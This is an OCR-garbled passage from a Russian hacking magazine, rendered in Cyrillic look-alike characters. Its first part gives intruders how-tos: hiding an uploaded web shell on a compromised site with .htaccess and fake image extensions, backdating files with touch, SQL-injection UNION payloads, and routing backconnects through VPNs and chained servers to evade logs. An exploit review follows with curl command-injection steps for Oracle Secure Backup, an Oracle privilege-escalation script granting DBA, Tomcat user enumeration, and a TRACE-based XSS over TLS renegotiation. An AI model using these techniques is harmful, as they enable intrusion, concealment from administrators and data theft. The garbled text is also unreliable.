< ГО« Т.АВ ТЕС АТАТОС =кЪ "т.АВ ТЕ_5 СНЕ МА= <ІѢо' Т.АВТЕМАМЕ= ,, ЮЬ1есЬ5'" СОТ^МN_NАМЕ= ,, ^8е^I(1 ,, 0ІШШАТ_Р05т0М= 
РАТА_ТѴРЕ=’"ті" ЫСІМЕШС_РКЕСІ8КЖ = "10" МСМЕШС РКЕСІ5ІОК КАВ^'ЧО" КРМЕШС_5САТЕ=‘‘07> 

<го\ѵ Т.АВ ТЕС АТАТОС =кЬ" ТАВ ТЕ_5 С НЕ М А= "ёЪа " ТАВТЕКАМЕ^-Ю^есЬз"" СОШМ^КАМЕ="Туре"' ОКВШАТР05ШОЫ=' 
ВАТА_ТУРЕ= ""ІПІ" ЫиМЕШС РНЕСІНІОЫ = ' 1 0" ИиМЕШС РКЕСІ5ЮМ КАОІХ= ,, 10" МЦМЕШС 5САТЕ=""07> 

< гон- Т.АВ ТЕС АТАТО С =кЬ ТАВ ТЕ_5 С Н Е М А = ” сІЬо " Т.АВТЕ_МАМЕ-“Ю^есІ5" СО^ТIМN_NАМЕ="5^аШ5 ,, 0КРтАТ„Р05ГГЮМ= 
ОАТА_ТУРЕ='іпГ N^МЕШС_РКЕСI5IОN='■10■■ ЫЦМЕЕаС_РКЕСІ5ЮК_КАШХ="10" КШ4ЕтС_5САТЕ="07> 

□опе 



№4 



ЗАДАЧА: ЗАМАСКИРОВАТЬ ШЕЛЛ ПОД 
МЕСТНОСТЬ С ПОМОЩЬЮ .НТАССЕ55 



РЕШЕНИЕ: 

Заливая шелл на какой- ни будь ресурс, ты, конечно, хочешь, чтобы он прожил 
максимально дол го и не был удален злобными админами в первый же день. 
Для этого шеллы прячут и маскируют под местность, чтобы файл не вызывал 



подозрений. А какие файлы в первую очередь вызывают подозрения? Ну, 
конечноже, скрипты. То есть, файлы с расширением .рЬр .рЫітІ .сді .рі ит.д. 
будут проверены первыми. И, напротив, невызываютподозрения, например, 
картинки. Но какая же польза от файла с расширением дрд или .дф скажешь 
ты. Ведь он неисполняемый и, если даже за су н^ь в него .рЬр-код,то, чтобы 
он заработал, нужен будет инклуд. Это не совсем так, а точнее, совсем нетак. 
Заставитьапач воспринимать файл слюбым расширением как.рбр нам 
поможет.ЫассезБ. 



► 040 
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Посмотрим, как это делается: 

1 . С оз да е м у се б я н а л о ка л ке фа й л . Ы:а ссе 55 сл еду ю ще го сод е ржа н и я ( м ожн о и 
прямо на сайте создать): 

АййТуре аррІісаТіоп/х-ІіССрсІ-рІір орд 

2 . Заливаем его на взломанный сайт в папку, где будем прятать наш шелл (это 
если в директории неттакого файла; если есть, то просто доба вляем кнему 
нашу строчку). 



3. Меняем расширение шеллу с .рЬр на зрд. 

4 . Переходим с веба на нашу «картинку» и видим, что она исполняется. 

Как видишь, все просто, теперь, зайдя в папку, админ видиттолько картинки, и 
шансов, что шелл будет найден, гораздо меньше. 

Разумеется, таким образом можно поставить абсолютно любое расшире- 
ние, будьто .М, .діб или вообще несуществующее .Іоі. Только злоупотреб- 
лятьметодом несоветую. Еслито, что ты делаешь, наноситвред функцио- 
налу сайта в целом, то шансы быть обнаруженным резко возрастают. 




ЗАДАЧА: ИЗМЕНИТЬ ВРЕМЯ СОЗДАНИЯ 
ФАЙЛА, ЗАМАСКИРОВАВ ТЕМ САМЫМ 
ШЕЛЛ НА САЙТЕ 



2 . Сделать Ше5 того же времени, что и Ше4: 

СоисЬ. -г Сі1е4 5і1е5 



РЕШЕНИЕ: 

Опять возвращаемся к вопросу сокрытия шелла, залитого на сайт. 
Каким образом админы находят и удаляют залитые файлы? Вариантов 
много, но один из них — поискпо дате создания и изменения файла. 

А это время мы можем изменить, тем самым усложнив админу задачу. 
Конечно, не панацея, но иначе шансы спалиться резко возрастают. 
Итак, приступим: 



3. Сделать Ше7 30 секундами старше, чем Шеб: 
СоисЬ. -г Сііеб -В 30 Іі1е7 

4 . Сделать Ше7 30 секундами моложе, чем Шеб: 
СоисЬ. -г Сііеб -Р 30 Іі1е7 



ШІХ СоисЬ. 



То же самое можно сделать средствами РНР функцией ІоисЫ): 



1. Поставить на файл определенную дату, формат: год месяц число час 
минута. 

СоисЬ. -1:2 0 081 11 82 00 5 арасЪ.рЪр 
Или так: 

СоисЬ. -б. ' Дап 31 2 007 12:34:56' арасД.рДр 



ЦоисІЩ * /из^/ѵллм/зіЦе.^и/шш/іпс^еx.р]пр , , біІетЦіте ( 1 /изг/ілллм/ 
зіЦе.^и/ѵллм/зЬо^лщкѵіЦ.р]пр , ) ) ; 

Нуи наконец, на шелле г57 есть специальная вкладка с одноименным 
названием, она поможет это сделать в удобном виде. 

Не забывай, что для изменения атрибутов нужно иметь соответствую- 
щие права. 




ЗАДАЧА: ВЫВЕСТИ ПОЛЕ ПРИ ИМЕЮ- 
ЩЕЙСЯ 50І.-ШЕСТІ0Ы И ПРОБЛЕМНОЙ 
КОДИРОВКЕ 



РЕШЕНИЕ: 

Для решения проблем с кодировкой есть несколько вариантов. К при- 
меру: 



1 6-ричному виду, далее снова в строчный вид. Второй способ аналоги- 
чен. Хочу отметить еще одну полезную сторону данного метода. 

К примеру, у нас есть зді-іщесііоп, одно из полей которой используется 
в инклуде (іпсіибе ($_гоѵѵ['І!Іе'].’Ыпп[’);), : Нам нужно обрезать расшире- 
ние файла, однако директива ппадіс_доиІе5 находится в положении 0 N , 
т.е. финт с нулл-байтом ( % 0 0 ) уже не пройдет. Тут-то к нам и придут на 
помощь уже знакомые функции. 



іЩЦр : //зіСе . сош/зсгірі: .рЬр?іс1=- 

1’ +ипіоп+зе1есЪ+1 ,ипЪ.ех (Ьех (ѵегзіоп ( ) ) ) ,3-- + 

либо 

іШСр: //зіТе . сош/зсгірі: .рЪр?ісІ=-1 ' +ітіоп+зе1еск+1 , АЕ8_ 
БЕСКУРТ (АЕ8_ЩСКУРТ (ѵегзіоп ( ) , 1 Іоі 1 ) , 1 Іоі ’ ) ,3-- + 

В первом примере мы сначала приводим результат функции ѵегзіопО к 



іШЦр : / / зіСе . сош/зсгірі: ,рЪ.р?ісІ=- 
1 ’ +ипіоп+зе1есД+1 , 0х. . .00,3--+ 

Вместо «...», естественно, будет файл, который должен, по твоему мне- 
нию, участвовать в инклуде, а в конце вставим нулл-байт в 16-ричном 
представлении, и он уже не будет попадать под фильтрацию тадіс_ 
диоіез. 




ЗАДАЧА: БЕЗОПАСНО ЗАБИНДИТЬ ПОРТ 
ИДИ СДЕЛАТЬ БЕККОНЕКТ НАУДАЛЕН- 
НОМ СЕРВЕРЕ 



РЕШЕНИЕ: 

Многие начинающие хакеры делают бекконект на свой компьютер. 
Это в корне неверно, так как ір-адрес послушно запишется в логи. 

В основном, бекконект делают либо на неткат на дедике (бебісаіеб 
зегѵег), либо на неткат на 55 Н- шелле (допустим, на Ѵ05). Хочу сразу 
обозначить, что для бекконекта на дедик нужно, чтобы последний 



обладал выделенным ір-адресом (белый ір). 

Заходить на дедик нужно обязательно через впн. В ином случае на нем 
также сохранится твой реальный ІР-адрес. 

Для 55Н-шелла требования не такие жесткие, для коннекта кним многие 
программы имеют поддержку прокси. В качестве зЫп-шеллов лучше 
использовать зарубежные ѵсІ5-сервера. 

Также можно сделать цепочку серверов при бекконекте.т.е. мы ставим 
на прослушку порт на промежуточном сервере, потом делаем бекконектс 
сервера-жертвы на промежуточный сервер, а потом коннектимся со свое- 
го компьютера уже не к серверу-жертве, а к промежуточному, т 
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взлом 



I АНДРЕЙ КОМАРОВ КОМАКОѴ@ІТОЕРЕМСЕ.ВІІ ИТЦ «АНАЛИТИКА» / ІТОЕРЕМСЕ.РУ 



ЕХРЮІТЗ 

РЕѴІЕѴѴ 




Г5 


1 





ОБЗОР ЭКСПЛОИТОВ 

СВОДКА Н0ВЫХУЯЗВИМ0СТЕЙ ЭТОГО МЕСЯЦА ОПЯТЬ ПЕРЕД ТОБОЙ. УДИВИТЕЛЬНО, НО ФАКТ, МЕНЬШЕ ИХ ПО СРАВНЕНИЮ С ПРЕДЫ- 
ДУЩИМИ МЕСЯЦАМИ НЕ СТАЛО. ВООБЩЕ. ЭТО ОЧЕВИДНО. ВЕДЬ ТЕНДЕНЦИИ ЗЛОУМЫШЛЕННИКА ВСЕГДА ОПЕРЕЖАЮТ РАЗРАБОТЧИ- 
КОВ. ТЕМ САМЫМ ПОДДЕРЖИВАЯ БАЛАНС МЕЖДУ ВЫПУСКАЮЩИМ РЕСУРСОМ И ПОДАВЛЯЮЩИМ. 



НТТРВедимІ •« НТТРВмрсгяе 

{тКАСЗ / НТТР/1.1 

<ЬЪіь1><5сгі$>т;>АІегс і н Ке11о* ></зсгір і с,></ііт:ьІ5 ТКАСЕ НТТР ' І I 



ІТі*г-Аф»пЬ: 

Кобъ: тан. япііі-*». сот 



МеШипд ѵоп ѴгѴеЬ^еіІе 



Г*1 



д 







й 5 

• - х 






@К 

Ѳ- 



ПР0ВЕДЕНИЕХ55 С ПОМОЩЬЮ МЕТОДАТКАСЕ 



РЕАЛИЗАЦИЯ АТАК НАТІ.5/ 
ББЬѴЗ РАСПРОСТРАНЯЕТСЯ НА 
МНОГИЕ ОБЪЕКТЫ ПРИКЛАДНО- 
ГО УРОВНЯ (ПРОТОКОЛЫ 5МТР5, 
РТР5) 



БАЗОВЫЙ СЦЕНАРИИ ТІ_5 
РЕМЕ60ТІАТІ0Ы 




ОБХОД АВТОРИЗАЦИИ В ПРОДУКТЕ 
РЕЗЕРВНОГО КОПИРОВАНИЯ ОКАСІ.Е 



Огасіе Зесиге Васкир представляет собой технологию централи- 
зованного управления резервного копирования на ленточные накопи- 
тели. Отличительная особенность продукта в том, что процесс резер- 
вирования может происходить без использования ресурса мощностей 
(зегѵег-іезз) посредством прямого копирования данных с физического 
ленточного носителя по протоколу І\ЮМР. 



ЕХРЮІТ 



| По словам разработчиков, в средах сетей хранения данных 
(Зіогаде Агеа ІЧеІѵѵогк, 5АІ\І) решение Огасіе Зесиге Васкир обеспечи- 
вает высокий показатель использования ленточных накопителей путем 
их динамического «разделения» между несколькими медиа-сервера- 
ми. Стоимостьлицензии Огасіе Зесиге Васкир составляет$3,5тыс. в 
расчете на один ленточный накопитель, включая защиту данных для 
неограниченного числа серверов, устройств ЫАЗ и баз данных Огасіе. 
Сам понимаешь, какие суммы могут накапать в хорошо развернутой 
сетевой инфраструктуре, где одной лентой уж точно не обойдешься. 
Обход авторизации позволяет несанкционированно получать доступ к 
резервируемым ресурсам, а также исполнять команды на целевой сис- 
теме. Свет долгое время не могувидеть подробностей уязвимости, так 
как афиширована она была сугубо вендорскому полюзренияикомпани- 
ям-разработчикам ІР5/Ю5 и антивирусных решений для отслеживания 
соответствующих аномальных действий при анализе трафика. 

По сути, уязвимость подразделяется на две составляющих, которые по 
логике и были задокументированы в базе СѴЕ, им выданы следующие 
номера: «II пзресібеб ѵиіпегабііііу іп Ібе Огасіе Зесиге Васкир сот ропепі 
іп Огасіе Зесиге Васкир 1 0.2. 0.3 аііоѵѵз гетоіе аііаскегз Іо аііесі 
сопббепііаіііу, іпіедгііу, апб аѵаііабііііу ѵіа ипкпоѵѵп ѵесіогз». 

1) сѵе.тіІге.огд/сді-Ьіп/сѵепате.сді?пате=СѴЕ-2009-1 977 

2) сѵе.тіІге.ога/саі-Ып/сѵепате.саі?пате=СѴЕ-2009-1 978 
Эксплуатация осуществляется в два этапа. Сначала злоумышленник 
получает валидную сессию, которую генерирует движок ѴѴЕВ-интерфей- 
са системы: 



# передача данных в РОЗТ-запросе 

розСсІаЦа= "ЬиСЦоп=Ьодіп&аЦЦетрЦ = 1&то<іе=&ЦаЬ=&ипате=-- 



1 акеорС і оп&раз зѵѵсІ= 1 акерѵѵсі " 

# непосредственное получение сессии после отправки 
РОЗТ ' а 

сигі -кіз "Ьккрз : /^ТАКСЕТ/Іодіп.ркр" -сі $розСсІаЦа I 
дгер " РНР8Е83ІБ= " I кеасі -п 1 | сиС -сІ= -6 2 | сиС — сЗ.\ ; -6 1 

Теперь остается только перейти к делу! Настоящий эксплоит по неавто- 
ризирова иному выполнению команд пишется в три строки: 

# подготовка команды для исполнения 
зке11= " 1%2 бѵегхэзЫОЗзкеІШтр" 

# организация запроса к уязвимому сценарию с указани- 
ем команды для исполнения ($зке11) и наличием валидной 
сессии ($зеззіоп) 

сигі -к -з "ТШкрз : //$ТАКСЕТ/ргорегку_Ъох.р1ір?Цуре=СЬ.ес 
кРгорегкіез&ѵо11ізк = $з]іе11 " -Ь " РНР8ЕЗЗІБ=$зеззіоп" > / 
сіеѵ/пиіі 

# просмотр выполнения результата 

скеск='сиг1 -кз "ТШкрз : /^ТАКСЕТ/озЪІОЗзкеІІЦтр" -Ь 
"РНР8Е88ІВ=$зеззіоп" | дгер -і МісгозоШ ' 

Финальной строкой мы просто убеждаемся, что вывод команды показал 
название версии СУБД и платформы. Полный сценарий для эксплуата- 
ции можно скачать здесь: сІоѵѵпІоасІз.зесигіЫосиз.сот/ѵиІпегаЫІіІіез/ 
ехрІоіІз/35672 35678.зЬ . 



БОШТІОЫ 



|Вендортакого уровня своевременно отреагировал на поя- 
вившееся сообщение в лентах Ьидігаск и выпустил исправление. 



ТАВОЕТ5 



Огасіе Зесиге Васкир Зегѵег 1 0.3.0. 1 .X. 




ПОДБОР СУЩЕСТВУЮЩИХ ПОЛЬЗОВА- 
ТЕЛЕЙ АРАСНЕТОМСАТ 



Известно, что на системе, где установлен Арасбе, находится (или 
может находиться] много пользователей. Конечно, сам Арасбе часто за- 
пускаютс правами «поЬобу», но песня о другом! Используя ошибку клас- 
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ЮІТ5 

ЕѴѴ 




Соо^Іе ]пми#рвг» с № ояімсВ[»3*5Г 

17 ПЫЕі. к ННфі*1» Г Пыи СфМЦ М ррш 




РчуЧЛ- 1*0 й'-'Ч» 

г<?\ ІлЫшІ ЯгОС Роагти№ дкі 5иалдЯНЕ*мЯ а*по6дЛРп^1і1иАР - 1 Пе;-: 
ЧЧГ*»’ * ^"1 'рЫіМЛ* ЛІчіМН > ІіЬі-ІИЙ ЯСгХВМ 

ОкѵЪ * ),МЯ 01*. и* ЫрчігііМш ВуІШПЕЮ М»«*і 

|Ь. іл 0 «-п ФфЭщі № и ФА * Аіг**Й фі «ДО „, 

— «* 1 •*№ ІИЯ_Н'ІТ_ІшшЩ І щ**_{>т ш * . Гл ГЕШЯ 

г* й.'У-' нт й ы№ ■ і . 



г р-1 Ёт Д С 'нт 9е«К г^ и ин'-зіз^і Ь И* ■ 1 1 

■Ими ДОлі ГОГЛМдЫ АичЬИ ■ В м» Н1М. 

(яц .СМИ# гтмгак-еріпі* Н 1 А№ч№*»ігтѵц ЙЬпГМІрЛНжі пнчиііп- [О Ь ВМІ 

К «№* Ртпірі [ОТЧІИІ] Ф ДОЛДОН Ы М йцпиткі, .... 




|>И1 И ^^/О а мГл Я Ч Г4 . - ^^Мінд ^д^яг 

^р'ч^^^ п ^ яг**** *«м - ±і -іял тгдм > 

шіи№^Ф Г іФАі:ііншнийтм^ ьм- _ 

ют НмиЬс «мраііі. [.мтѴ ШС іи йіа^!АііОіЖ»я1іЛѴіиаѴм»іі^ |Л 

’^ м с- УГ Н ^ ^ТЦ^ Р-ЗЯ Д И Я НЙРі - [ ПіИНЕИ 1ТТ Ч ФІМІІ ( 

; :|АІІ1 4 гілк РЕНДЛ** ДспМ ■ Би:шиЯ -юеім-і 

В I І'І фяЬсчфіп* г ІІн (ІНІ В 1 іѵ сптуМпд М імниі ивніяі Рфці I п* I 
&Ч ЖВ Ш./Л Ачпф *Н*Ѵ«*7ѴіЛі.пІ<ІДО1 М» ... 

- * ДОЮІЯЮТт* 



*“І І Т ШІ Л И*С,'& Й УТЧЯІ - У Н ^' Гі^'п'Р КЦ'аУІЛ^ СЗД5 - 1 Па-: ■ х ЛІ .:: к:пе I 
«до* ф*Дім №М М* ЛСчЬЯ - ДцгтДОррдг»-, 

тм ™ ім НФ щ **** 



КАК ВИДИШЬ, Р0ЛЬ0РАСІ_Е5ЕСІІРЕ ВАС КІІР ДОСТАТОЧНО ВЕЛИКА 
И ПОЗВОЛЯЕТ РЕЗЕРВИРОВАТЬ ДАННЫЕНА НАИБОЛЕЕ КРИТИЧНЫХ 
ОБЪЕКТАХ 



НАГЛЯДНЫЙ ПРИМЕР — ПОЛЬЗОВАТЕЛЬСКИЕ ПУТИ КАКНАЛАДОНИ! 



са «Оезідп Еггог», а именно ошибку в реализации и проектировании со 
стороны разработчиков, существует возможность перечислить текущих 
пользователей системы! В принципе, такая возможность существовала 
и ранее во многих версиях известного ѴѴЕВ-сервера: 

/~гоок 

/-апсігез 

/~доду 

/~бео 



Между прочим, одним из первых сканеров безопасности, который 
проводил проверки на предмет перебора пользователей поАрасбе, был 
Ыеззііз (существует реализованный плагин на ЫА5Ц а затем и отечест- 
венный ХВрібег. 



ЕХРЮІТ 



Сейчасэто можноделать, формируя специальный Р05Т-за- 



прос: 



Р08Т /з_зесигіЦу_сЬеск НТТР/1.1 
Нозк: шт. ехашріе . сот 



3_изегпате=котсак&ашр; :і_раззчлгог(і=% 

Комбинируя связки логин и пароль, можно добиться раскрытия данных 
учетныхзаписей локальных пользователей, а по возврату ошибки, 
наоборот, убедиться, что их нет в системе. 



50ШТЮЫ 



многие ОС. 



Обновления нашли своих героев, распространяется на 



ЕХРЮІТ 



|Код эксплоита выполнен в двух вариациях — классический об- 
ход авторизации и ЗОЫщесбоп, а во второй применяется метод Сигзог 
Іщесбоп. Классический обход ограничений: 



зек зегѵегоикрик оп; 

ргошрк [ + ] скхзуз-с!гѵхкаЪс-сгеаке_каЫез . зді ехріоік 
ргошрк [ + ] Ьу Апсігеа "Ьипкег" Ригікісако — кккр : / / 
гамІаЬ . тіпсісгеакіопз . сот 

ргошрк [ + ] 37Е1 А7А1 ВВ94 89БВ А920 3105 9Р74 7349 АР4С 

ВРА2 

ргошрк 

ипсіекіпе кке_изег; 

ассерк кке_изег скаг ргошрк 'Тагдек изегпаше (сіекаиік 

ТЕ8Т) : ' сіекаиік ' ТЕЗТ ' ; 

ргошрк 

ргошрк [-] Виіісііпд еѵіі кипскіоп. . . 

СКЕАТЕ ОК ВЕРЬ АСЕ РШСТІСЖ ОШ КЕТШШ ЖМВЕК 
АБТНІБ СШКЕШЦБЗЕК АЗ 
РКАСМА АБТ0ШМ0БЗ_ТКАЫ5АСТІ(Ж; 

ВЕСШ 

ЕХЕСБТЕ ІММЕБІАТЕ ' СКАБТ БВА ТО &кке_изег ' ; СОММІТ; 
КЕТБШ ( 0 ) ; 

ЕЫБ; 

/ 

ргошрк [-] Ріпізкіпд. . . 



ехес скхзуз . сІгѵхкаЬс . сгеаке_каЫез ( ' 1 I |изег| | ' " . "х" аз 
зеіеск * кгош сіиаі вдкеге ' I I БЗЕК № . оѵт=0-- ' , ' х ' , 2 ) ; 



ргошрк [ - ] УОБ СОТ ТНЕ РОТлГАН ! ! 



ТАР6ЕТ5 



Множество платформ, позволяющихустановку ЗАѴА + Арасбе 



(Тотсаі). 




РЕАЛИЗАЦИЯ ОБХОДА БЕЗОПАС- 
НОСТИ В ОРАСЬЕ (СТХ5Ѵ5.0РѴХТАВС. 
СРЕАТЕ_ТАВЬЕ5) 



Е2ШЗ Нарушение безопасности заключается втом, что непривиле- 
гированный пользователь унаследует права бба, после чего сможет 
произвести практически любые действия, используя всю мощь СУБД. 



ТАР0ЕТ5 



Огасіе БВ 9і/1 Од. 



ЕХРЮІТ 



Пока нет, но скоро выйдетобновление, устраняющее уязвимость. 




УЯЗВИМОСТИ В ПРОТОКОЛЕ 
ТІ.5/55І.ѴЗ 



ЕШЗ Еще в начале ноября специалистами была создана заметка о воз- 
можности эксплуатации некоторых уязвимостей протокола ТБ5 в 55БѵЗ. 
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взлом 



Ы:Др : /Лѵ ѵѵ ѵ , е сіа , до ѵ/РОР/Е &А_ѵЫі; %20Іи и е 1 0 , рй? 



<х: хгпрпеЬв віпз : ?*"а(ІоЬе: пе : яеі а/" , ѵ . : «.врі ки"АііоЬе КНР Саге 4 . Ѳ-с^1Б 44.253921, Бип Осі 01 2006 
ЭІ7:14:39 ,Ѣ > 

*г4РГ ВОР ЛИІП8 : г № 1 'М Ър: /Лтт.мЗ. сг*/ 1993/02 /22 -Г0Р- 8 уіГЕ АЛ - П8*"> 

<г4^;0е^сгір^іоп геНЧвЬсні**"" 

- иіп*: сге«"іЛір: //ригі . огр/йс/еіеиет і/1 Л / ч > 

<4 с : Рогтаі > арр 1 ісіЛ іап/ ріНЧ/4 С : і оГтаІ > 

<6с:сгеэіаг> 

<гб*:5е^> 

<ГЙР: 1і>І.енД«5</г4іГ;1і> 

</гЛ?'Лец> 

</4с:сгеаійг> 

Л* «к;1:Ше> 

12. <гйР: Аіі> 

33* <г1Р;1і ШІ; ійпе*"л-4Н г лиИ">^іДе;//С; ѴОосииспи апгі 5е*Нп^иеи*«:Л0«кІФр\«*9 

^ пеи5Іе*+*г</гд^: 1і> 

</гйР:А1І> 

35* </<к:Тіі1е> 

іб, </г д Р : а«ег1рііоп> 



ЬНр : //уіѵі ѵ/ . □ гедоп . д □ и /О М0/0ЕРѴрІап5_*гзіл/дгапЫпЩ Ду 2009_1 -і 5 д р_іпѵв5 1 гнал О и5 * ' Йса 1 ' оп - рЕ^ 



<х:хтряе1э >іщ1П5;*» І, я(ІаЬе:л5:ііеДв/ м ..:.-;яр*Ь* н З*2-701 н > 

<гв^ : ВОР «1 П5 : г<Н ? - , *Ьі * р: / /м«*. иЗ . ог%/ 1 999/02 / 22 -ггіГ - 5 уп* ах, - П5*“> 

Сггі'РіОеісгір'Ьіоп гіИГ: аЬоііІ:»"" 

■ *1т: : рсІ^’ЧгіІр; //пе г асіФре. сор/ріН^/і , 3/"> 

<р4*:РГ0(]иеег>АеГ0Ьа* 0І8ІІ11«Г 7.0.5 Щіпййк8 ) </рЙ1Г : РГо4иеег> 

Об* </г46:0е5сгіріісіл^ 

07 , <гй* : Оеісг і р* іоп п№ : а&оиі «'“* 

, ,ИІП5 : .тйр-'ЧШрі //Пі . аІоЬс . сои/лар/1 . Ѳ/ м > 

<хэр: Сгеа^ФгТаа1>Р5сгір*5, 411 Ѵег*і*щ 5, 2* 2</хар:Сп?аТогТоо1> 

ІО. <хар: Мй4і?уОйГ::>2009-бЗ-1ВТ15; 07: 10-07: 0Ѳ</кСір: МйЛІГуОаІС} 

31* Схар: Сгеа±еОа*і>>г009-03-Д8Т1Б: 07: 10-07: Ѳ0</хар: СгеаѣеВаіе» 

12 * </гС і : Оеіс г і рД іел > 

<Г4 I й і ОйііГ і р* ібіі Г(РР: аьоис 
34 * ■! п* : 4 с *"М Д р е / /риг 1 н ФГЯ/0С / еі ея е пД 5 /1 * 1 7 *> 

15. <йс : Рагта і >арріісаДіоп/рйД : < /4е : <огта*> 

36* 

17* <г4Р:АЫ:> 

<гйГ:іі ,'■!: іопе-' , х-аебаиН">ііИй1:-РІ1е://0:\і г ем\8П4р_20в!9\Лг»Рі іЗяѴРУ 2вѲ9 іпѵдеіаепі 

</гд*:дИ> 



ЕХРЮІТ5 




ЕХРЮІТЗ 


РЕѴІЕѴѴ 




РЕѴІЕѴѴ 




ЕХРЮІТЗ 

РЕѴІЕѴѴ 




СУЩЕСТВУЕТ ОЧЕНЬ МНО- 
ГО ПО, ПОЗВОЛЯЮЩЕГО 
УДАЛИТЬ М ЕТАДАН Н Ы Е ИЗ 
ДОКУМЕНТОВ КОРПОРАТИВ- 
НОГО ТИПА 



ПРИМЕР МЕТАОПИСАНИЯ РРР 



Ей даже была присвоена метка в базе СѴЕ (СѴЕ-2009-3555), но должного 
внимания со стороны общественности она не привлекла, хотя исполь- 
зованиеТЕЗ крайне широко (Місгозо^ Іпіегпеі Іпіогтабоп Зегѵісез, 
тоб_55І, 6ЫЕІТЕ5, Мо^іііа Ыеіѵѵогк Зесигііу Зегѵісез]. Уязвимость вызва- 
на некорректной обработкой гепедобабоп бапсізбакез с существующим 
подключением, что позволяет осуществлять атаку «человек в середине» 
(МІТМ) и внедрять произвольные данные, втом числе и вредоносные, в 
НТТР5/55Е/ТЕ5-сессию. Организуется та кая процедура путем отправ- 
ки специально сформированного пакета, который воспринимается 
сервером в розі-педобабоп контексте, что еще носит альтернативное 
название «ріаіпіехі-ата ка». 

Когда речьидето«Мап іп 1Ье тіббіе», по-хорошему, подразумевает- 
ся перехват и последующая подмена данных. Для этого существует 
множество сценариев, поэтому описанное далее относится не кодному 
привычному НТТР/НТТР5- протоколу, но и ко всем приложениям и про- 
токолам, использующим ЗЗЕѵЗ или ТЕЗ. Общий сценарий эксплуатации 
основан на следующих принципах: 

1. Легитимный клиент начинает сессию ТЕЗ «рукопожатия» (ЬапбзЬаке). 

2 . Злоумышленник, вклиниваясь между клиентом и сервером обраще- 
ний, уста на вливает пол ноценнуюТЕЗ-сессию с сервером, к которому 
обращается клиент. 

3. Злоумышленник начинает искусственное взаимодействие с сервером 
на прикладном уровне. 

4 . При таком раскладе мы наблюдаем следующее. ТЕЗ «рукопожатие» 
доверенного клиента продолжается, его никто не обрывал (клиент <> 
сервер], но внутри него новая шифрованная сессия (атакующий <> 
сервер]. 

Применительно к НТТР5 возможностей сделать инжект собственных 
данных в авторизированный поток несколько: 

1. Внедрение СЕТ/РОЗТ-запросов, без их конечного завершения. Это 
позволяетсмешивать запросы клиента и атакующего, подавляя коман- 
ды клиента. 

2 . Принудительный уход от использования НТТР5 к НТТР. Атакующий 
внедряет НТТР-запрос, направленный на ресурс, который доступен по 
ЗЗИ, после чего выполняется перенаправление на НТТР. Иным названи- 
ем атаки является термин «Ооѵѵпдгабіпд» (НТТР5 > НТТР]. Реализацию 
можно изучить в утилите, созданной Реак (Раѵеі Копкоѵзку], а позже 
модифицированной Тбіеггу Еоііег (с- 5ес.[и/55І-302-іпр.с 1. 

# при компилировании обязательно укажи сборку с примене- 



нием хидеров библиотеки ОрепЗЗЬ 
дсс -Іззі зз1-302-іпр . с -о ЗЗІ-302 

# пример эксплуатации 
. /взІ-302 8080 /зеагсЬ/гебіг . рЬр 

3. Использование метода ТРАСЕ. Злоумышленник внедря- 
ет метод ТРАСЕ в ряд НТТР-запросов, получая управление 
над содержимым, которое посылается от сервера клиенту по 
НТТР5. Наверняка, по старинке тебе известно, что ТРАСЕ 
используют для проведения ХЗЗ-атак. Рассмотрим сцена- 
рий. Сначала клиент по ЗЗЕ-сессии цепляется за удаленный 
ресурс по ѴѴ Е В ’ у : 

СЕТ / НТТР/1.1 
Нозб: зегѵег.сош 

Все бы ничего, но кактолько мы встанем у него на пути, запрос изменит- 
ся на следующий: 

ТКАСЕ / НТТР/1 . 0 

X : <1іЦт1><зсгірЦ>а1егР ( ’ііеііо 1 ) </зсгірРх/Ь.бт1> 

: Х-ідпоге : СЕТ / НТТР/1.1 
Нозб: зегѵег.сош 

Если все прошло ОК, сервер ответит: 

НТТР/1.1 200 ОК 
[бгішшеб] 

Сопбепб-Туре : шеззаде/ТШбр 
ТКАСЕ /забаз.рбТ НТТР/1.1 

<Ьбт1><зсгірЦ>а1егб ( ’НеІІо 1 ) </зсгірбх/ТЩт1> : 

Нозб: шт . зегѵег . сот 

В контексте клиента может выполниться вредоносный код, причем 
самой разной направленности. Конечно, многие браузеры устойчивы к 
такомутипу атак, но ведь существует ряд браузеров, которые используют 
ТВЮЕІМТ-движок (твЫплЫЩ и грешат корявой обработкой НТТР-заго- 
ловков. 



► 044 
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ЧАСТИЧНОЕ РАСКРЫТИЕ ПОЛЬЗОВА- 
ТЕЛЬСКИХ ДАННЫХ В МЕТАОПИСА- 
НИИ ФОРМАТА РРР 



Вопрос выборки пользовательских данных из офисныхданных 
очень часто применяется в области промышленного шпионажа и раз- 
ведки. Скажем, тебе в руки попал какой-либо документ, тебя интересует 
его подлинное авторство, возможный список машин, по которым «гулял» 
этот документ, имена машин, на которых он был прочтен и редактиро- 
ван. Даже с та кой информации можно в явном виде понять заказчика и 
исполнителя, их подрядчиков и промежуточные конторы, взаимосвязи 
между науко-техническими департаментами и отделениями, кураторов 
новых разработок, ответственных за ведение какого-либо направле- 
ния и много другой информации. Недавно, мир ИБ и прочих шалостей 
немного удивила новость, что во множестве РБР-документов были рас- 
крыты пути хранения документа более чему миллиона пользователей! 



ЕХРЮІТ 



|Для поиска подобной информации с использованием откры- 
тых источников (например, 0 о о д Іе ] можно использовать следующие 
поисковыезапросы: 



кііекуре : рсИ кі1е с (Ынп ОЕ Ькті ОЕ шЬСшІ) (4 миллиона 
результатов) 

РіІеСуре : рсЕ: кі1е <5. (Ылп ОЕ Ькті ОЕтЫітІ) (~13 милли- 
онов результатов) 



Имея явные склонности кзлодейству, приведу пару примеров выборки: 

СІоЬаІ Адгісиікигаі Іпкогтакіоп Бекѵгогк 

оккачла . изетЪаззу . доѵ/сопкепк/етЪсопзи1/рс1кз/каз_ 

кчліса25_2 009 . рсіі: 

тккті : кііе : / /С : \Воситепкз апсі Зеккіпдз\тісЬае1с:і \Ьоса1 
Зеккіпдз 



ШЕВ-Зегѵег Зкакізкісз Рог рікксоипкупс . доѵ 
рікксоипкупс . доѵ/Ьеркз/тіз/1еаЬегЪоагс1/ілплпл.рс1к 
кііе : / /С : \Ргодгат Рі1ез\гитгиппег\апа1од\ѵ\Плпл. Ькті 



Письмецо 

загщозеса . доѵ/соуокеѵа11еу/ЕІЕ/ВЕІЕ/БЕІЕ_Соттепкз/ 
Іп<іі ѵісіиа 1 з / 0 6 - 2 9 - 0 7_Епде 1 1 - ЦоПп . р<і:І: 
кііе : //С : \Воситепкз ап<9. Зеккіпдз\ Багесі. Нагк\Везккор\ 
Епдеіі . Ькт 



ТЕБЕ СЬО Беѵлзіеккег 

